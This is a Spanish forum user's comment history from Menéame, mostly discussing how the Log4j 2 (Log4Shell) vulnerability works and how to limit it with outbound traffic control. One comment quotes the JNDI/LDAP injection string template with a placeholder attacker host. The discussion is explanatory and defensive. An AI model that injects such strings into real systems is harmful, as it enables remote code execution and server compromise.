edición general
nodanero

nodanero

En menéame desde mayo de 2007

6,04 Karma
47K Ranking
Enviadas
Publicadas
Comentarios
Notas

CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones] [55]

  1. #52 alvdavi
    #51 Quiza cuando haya pasado un tiempo prepare un articulo explicando todos los detalles de esta vulnerabilidad
    0 K 6
  1. #45 alvdavi
    #42 vale, acabo de leer hasta el final y creo que he encontrado lo que puede haberte llevado a confusión. Muestran logs donde se ve algo parecido a ${jndi:ldap://<ip>/<comando_en_base64>}.

    Lo que ocurre en este caso no es que el servidor ejecute directamente el comando en base 64 que está ahí, sino que alguien ha creado un servidor ldap en <ip> que cuando le preguntas por <comando_en_base64> El servidor ldap responde con un exploit generado dinámicamente para ejecutar ese comando. Pero la máquina atacada sigue teniendo que conectar a ldap://<ip>/<comando_en_base64> y descargar el exploit.
    1 K 9
  1. #43 alvdavi
    #42 sacado de tu enlace:

    By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload.
    0 K 6
  1. #40 alvdavi
    #37 creo que puedo decir sin miedo a equivocarme que conozco esta vulnerabilidad extremadamente bien, y no funciona como dices. Si tienes el enlace, puedo echar un vistazo, ver exactamente qué comentan, pero estoy convencido que hablan de la vulnerabilidad de ejecución remota que todos conocemos
    0 K 6
  1. Caelestis #35 Caelestis
    #11 Esto... si tengo un ecommerce tengo q tener la entrada HTTP/HTTPS abierta a cualquiera que quiera comprarme (aunque siempre se puede limitar por país de origen o por reputación de IP para controlar un poco).

    Pero mi servidor web no tiene porqué tener salida a Internet por si mismo, más que a aquello que necesite.
    #3 Veo que #6 lo ha explicado mejor que yo :roll:

    #24 Obviamente no hay solución mágica (o dejaríamos de cobrar a final de mes :shit: ) pero como 'la moda' es usar sistemas modulares donde una vez tomas control del servidor te descargas los módulos que necesites... con un buen control de tráfico saliente limitarías muchos ataques.

    Aunque es más fácil decir que hacer :-P
    1 K 17
  1. #34 alvdavi
    #24 para invocar otros comandos este ataque primero tiene que hacer que la máquina atacada se conecte a un servidor remoto
    1 K 9

Los certificados electrónicos del DNIe serán sustituidos para garantizar la máxima seguridad [100]

  1. santiagogf89 #94 santiagogf89
    #73 #34 ¿Lo habéis comprobado con vuestra propia clave pública? ¿Podéis poner un pantallazo de keychest.net y el fallo?
    0 K 9

menéame